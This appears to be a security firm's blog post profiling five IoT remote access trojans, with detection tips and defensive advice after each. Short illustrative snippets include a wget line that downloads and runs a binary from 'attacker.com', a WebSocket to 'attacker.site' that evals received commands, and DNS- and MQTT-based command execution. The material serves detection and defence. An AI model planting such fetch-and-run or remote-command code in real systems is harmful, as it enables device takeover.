If you think IoT devices are just harmless smart assistants or home cameras, think again. In 2025, cybercriminals are exploiting these everyday conveniences as entry points for powerful Remote Access Trojans (RATs). I’ve tracked and reverse-engineered several IoT RATs this year, and it’s clear they’re no longer script-kiddie tools. These RATs are modular, stealthy, and devastating.
In this post, I’ll walk through five of the most dangerous IoT-focused RATs currently in the wild. But before diving in, let’s quickly establish what makes an IoT RAT different from the desktop or mobile variants.
-Book Your Free Security Consultation Today!
Table of Contents
What Are IoT Remote Access Trojans?
IoT Remote Access Trojans are malware designed specifically to target and control internet-connected devices like routers, IP cameras, smart TVs, and even refrigerators. Unlike typical RATs, which rely on full operating systems like Windows or Android, IoT RATs have to operate with minimal system resources and often without standard APIs.
That constraint has pushed their developers to get creative. Most IoT RATs:
Exploit weak/default credentials or outdated firmware.
Use lightweight payloads written in C, Lua, or Python.
Communicate over obscure or non-standard ports.
Persist using cron jobs, init scripts, or patched binaries.
Here are the top offenders I’ve come across in 2025.
Check Out This Blog On How Remote Access Trojans Work
1. NOIRWorm
Overview: NOIRWorm targets consumer-grade IP cameras and DVRs. It spreads laterally within home networks and uses compromised devices for surveillance or DDoS-for-hire.
Implementation Strategy:
Brute-forces Telnet and SSH using hardcoded credentials.
Drops a statically compiled MIPS binary.
Connects to a Tor-hidden C2 server.
Code Walkthrough (BusyBox infection shell snippet):
if wget http://attacker.com/noir -O /tmp/noir; then
chmod +x /tmp/noir
/tmp/noir &
fi
Detection Tip: Monitor for unknown processes running BusyBox with network sockets open. Deploy honeypots to catch brute-force attempts.
2. IoTReaper++
Overview: An upgraded version of the original IoTReaper, this variant adds WebSocket-based C2 and support for newer smart thermostats and cameras.
Implementation Strategy:
Scans for web interfaces on port 80/443.
Injects JavaScript into the device’s admin panel to create persistent sockets.
Controls the RAT using browser-like C2 sessions.
Code Walkthrough (Injected JavaScript payload):
let ws = new WebSocket('wss://attacker.site/c2');
ws.onmessage = (event) => {
eval(event.data);
};
Detection Tip: Analyze the source code of embedded web panels. Flag devices making unexplained persistent WebSocket connections to unknown domains.
3. ShadowBot
Overview: ShadowBot is an ARM-compiled binary that turns infected IoT devices into proxy relays and command execution nodes. It’s often found in botnets used for anonymizing cybercrime.
Implementation Strategy:
Uses UPnP to expose internal ports.
Installs custom iptables rules to route traffic.
Periodically polls a C2 server via DNS.
Code Walkthrough (Embedded DNS C2 resolver in C):
char *lookup_domain = "cmd.shadowdns.co";
struct hostent *host = gethostbyname(lookup_domain);
if (host) {
execute_command(host->h_addr);
}
Detection Tip: Use deep DNS inspection. Any IoT device resolving a domain multiple times per minute should raise a red flag.
4. MiraiX
Overview: MiraiX is the latest variant of the infamous Mirai botnet, redesigned for microcontrollers in smart meters and smart locks. It’s smaller, harder to detect, and runs on embedded RTOS environments.
Implementation Strategy:
Compiled with stripped symbols to reduce binary footprint.
Injects itself into firmware memory.
Uses MQTT for encrypted communication.
Code Walkthrough (MQTT Client Init in C++):
MQTTClient client("iot-server.local", 1883);
client.setCallback([](string topic, string msg) {
execute_command(msg.c_str());
});
client.subscribe("/iot/cmd");
Detection Tip: Inspect outbound MQTT connections. Unexpected connections to public brokers or encrypted MQTT over TCP/8883 is often suspicious.
5. PyWasp
Overview: PyWasp is a Python-based RAT deployed on Raspberry Pi-based IoT devices in industrial control systems. It’s designed for persistence and low-noise data theft.
Implementation Strategy:
Installs via SSH using stolen keys.
Uses cron jobs to survive reboots.
Sends logs and screen captures to Dropbox or Mega.
Code Walkthrough (Main loop):
import dropbox
client = dropbox.Dropbox('ACCESS_TOKEN')
with open('/tmp/metrics.log', 'rb') as f:
client.files_upload(f.read(), '/metrics.log')
Detection Tip: Audit cron jobs and SSH keys on embedded Linux systems. Flag IoT traffic to cloud storage services like Dropbox or Mega.
Conclusion
IoT devices are often treated as background infrastructure – plug them in, forget them. That mindset is what allows these RATs to flourish. They exploit weak configurations, hide in firmware, and communicate over unexpected protocols.
From Tor tunnels in IP cameras to MQTT in smart locks, 2025’s IoT RATs are sophisticated and quiet. They don’t just disrupt your smart home; they infiltrate corporate networks through rogue smart plugs and HVAC units.
I recommend using device discovery tools like Nmap with custom IoT signatures and combining them with memory analysis tools like Volatility or network behavior analysis with Suricata. If you’re a blue teamer, start segmenting IoT traffic, applying outbound firewall rules, and watching those low-bandwidth anomalies.
Why Businesses Trust SecureMyOrg for Comprehensive Network Security
At SecureMyOrg, we uncover and fix all possible security vulnerabilities of mobile and web, while providing solutions to mitigate risks. We are trusted by renowned companies like Yahoo, Gojek and Rippling, and with 100% client satisfaction, you’re in safe hands!
Some of the things people reach out to us for –
- Building their cybersecurity program from scratch – setting up cloud security using cost-effective tools, SIEM for alert monitoring, building policies for the company
- Vulnerability Assessment and Penetration Testing ( VAPT ) – We have certified professionals, with certifications like OSCP, CREST – CPSA & CRT, CKA and CKS
- DevSecOps consulting
- Red Teaming activity
- Regular security audits, before product release
- Full time security engineers.
Relevant Posts
Top 5 IoT Remote Access Trojans Crippling Devices in 2025
IoT devices are under siege in 2025 as Remote Access Trojans exploit their vulnerabilities at scale. This blog breaks down the top 5 IoT RATs causing widespread disruption.
Top 5 Web-Based Remote Access Trojans That Are Dominating 2025
Web-based Remote Access Trojans are becoming the go-to tool for cybercriminals in 2025. This post highlights five of the most widespread and dangerous ones currently in use.
Unstoppable Malware: Top 5 Modular Remote Access Trojans Dominating 2025
Modular Remote Access Trojans are evolving fast in 2025, making them harder to detect and remove. This post explores five of the most dangerous RATs currently used in cyberattacks.
Top 5 Mobile Remote Access Trojans Wreaking Havoc in 2025
Uncover the top 5 mobile RATs of 2025, learn how they infect devices, execute attacks, and discover key strategies to detect and stop them effectively.
Top 5 Advanced Persistent Remote Access Trojans (RATs) in 2025
This blog explores five of the most sophisticated Advanced Persistent Remote Access Trojans (AP-RATs) currently active in the cyber threat landscape. We analyze their infection vectors, stealth mechanisms, command-and-control infrastructure, and persistence techniques to help security professionals understand and defend against these high-risk threats.
Top 5 Basic Remote Access Trojans (RATs) You Shouldn’t Ignore in 2025
Remote Access Trojans (RATs) remain a major cybersecurity threat in 2025. Learn about the top 5 basic yet dangerous RATs known for stealthy infiltration, keylogging, and full system control. Learn how they operate and how to defend against them.